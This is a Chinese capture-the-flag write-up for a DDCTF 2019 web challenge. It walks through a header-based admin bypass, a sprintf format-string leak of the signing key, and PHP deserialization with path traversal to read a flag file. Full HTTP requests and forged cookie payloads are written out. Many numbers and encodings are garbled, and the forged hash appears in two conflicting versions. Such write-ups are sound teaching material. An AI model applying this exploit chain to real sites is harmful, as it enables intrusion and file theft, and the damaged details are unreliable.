http://117.51.158.44/index.php
两次抓包 有一个didictf_username
的值设置为admin
您当前当前权限为管理员----请访问:app/fL2XID2i0Cdh.php
访问app/fL2XID2i0Cdh.php
可以获得源代码
观察源码,可以知道 程序对cookie有验证机制
$hash = substr($session,strlen($session)-32);
$session = substr($session,,strlen($session)-32);
if($hash !== md5($this->eancrykey.$session)) {
parent::response("the cookie data not match",'error');
return FALSE;
}
如果验证正确 就会有一个序列化的操作
直接访问 /app/Session.php
GET /app/Session.php HTTP/1.1
Host: 117.51.158.44
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
didictf_username: admin
Cookie: BL_D_PROV=undefined; BL_T_PROV=undefined; BL_D_PROV=undefined; BL_T_PROV=undefined
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
可以获得如下cookie
ddctf_id=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227ff2d9fa4b9f72700aa0787fbb60c03e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A11%3A%22110.83.19.7%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A82%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.14%3B+rv%3A66.0%29+Gecko%2F20100101+Firefox%2F66.0%22%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D782e78e81fcebe135f54c659a32a31e6
url解码 得到如下字符串
a:4:{s::"session_id";s::"7ff2d9fa4b9f72700aa0787fbb60c03e";s::"ip_address";s::"110.83.19.7";s::"user_agent";s::"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0";s::"user_data";s::"";}782e78e81fcebe135f54c659a32a31e6
有一串序列化的值,还有串md5
查看源代码可知,这是序列化的值和key.txt拼接之后才得到的md5
本题的漏洞点在这:
public function __destruct() {
if(empty($this->path)) {
exit();
}else{
$path = $this->sanitizepath($this->path);
if(strlen($path) !== ) {
exit();
}
$this->response($data=file_get_contents($path),'Congratulations');
}
exit();
}
}
我们的任务是要构造特殊的序列化的值类似与这样
O:11:"Application":1:{s::"path";s::"..././config/flag.txt";}+md5
我们的任务就是要找到md5 要找到md5的方法就是要找到key值,
观察如下代码:
if(!empty($_POST["nickname"])) {
$arr = array($_POST["nickname"],$this->eancrykey);
$data = "Welcome my friend %s";
foreach ($arr as $k => $v) {
$data = sprintf($data,$v);
}
parent::response($data,"Welcome");
}
这里面是有个格式化字符串的漏洞的:
构造如下包
POST /app/Session.php HTTP/1.1
Host: 117.51.158.44
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/ Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-aliv
didictf_username: admin
Upgrade-Insecure-Requests:
Cookie: ddctf_id=a%A4%A%Bs%A10%A%session_id%%Bs%A32%A%d6422e9e796e957c70ade5%%Bs%A10%A%ip_address%%Bs%A11%A%22110.83.19.7%%Bs%A10%A%user_agent%%Bs%A82%A%Mozilla%F5.0+%Macintosh%B+Intel+Mac+OS+X+10.14%B+rv%A66.0%+Gecko%F20100101+Firefox%F66.0%%Bs%A9%A%user_data%%Bs%A0%A%%%B%D3e0de25e5c5ec1fa2a3c9243ed5e5e19
Cache-Control: max-age=
Content-Type: application/x-www-form-urlencoded
Content-Length:
nickname=%s
得到key的值
HTTP/1.1 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Tue, Apr :: GMT
Content-Type: application/json
Connection: keep-alive
Content-Length:
{"errMsg":"success","data":"\u60a8\u5f53\u524d\u5f53\u524d\u6743\u9650\u4e3a\u7ba1\u7406\u5458----\u8bf7\u8bbf\u95ee:app\/fL2XID2i0Cdh.php"}{"errMsg":"Welcome","data":"Welcome my friend EzblrbNS\r\n"}{"errMsg":"sucess","data":"DiDI Welcome you Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko\/20100101 Firefox\/66.0"}
找到了key
EzblrbNS
然后构造序列化的值
O:11:"Application":1:{s::"path";s::"..././config/flag.txt";}
EzblrbNSO:11:"Application":1:{s::"path";s::"..././config/flag.txt";}5a014dbe49334e6dbb7326046950bee2
构造cookie
O:11:"Application":1:{s::"path";s::"..././config/flag.txt";}e5de768d30d12a3d53ba10235b5712a7
O%3A11%3A%22Application%22%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A21%3A%22..././config/flag.txt%22%3B%7D5a014dbe49334e6dbb7326046950bee2
然后得到flag
{"errMsg":"success","data":"\u60a8\u5f53\u524d\u5f53\u524d\u6743\u9650\u4e3a\u7ba1\u7406\u5458----\u8bf7\u8bbf\u95ee:app\/fL2XID2i0Cdh.php"}{"errMsg":"Congratulations","data":"DDCTF{ddctf2019_G4uqwj6E_pHVlHIDDGdV8qA2j}"}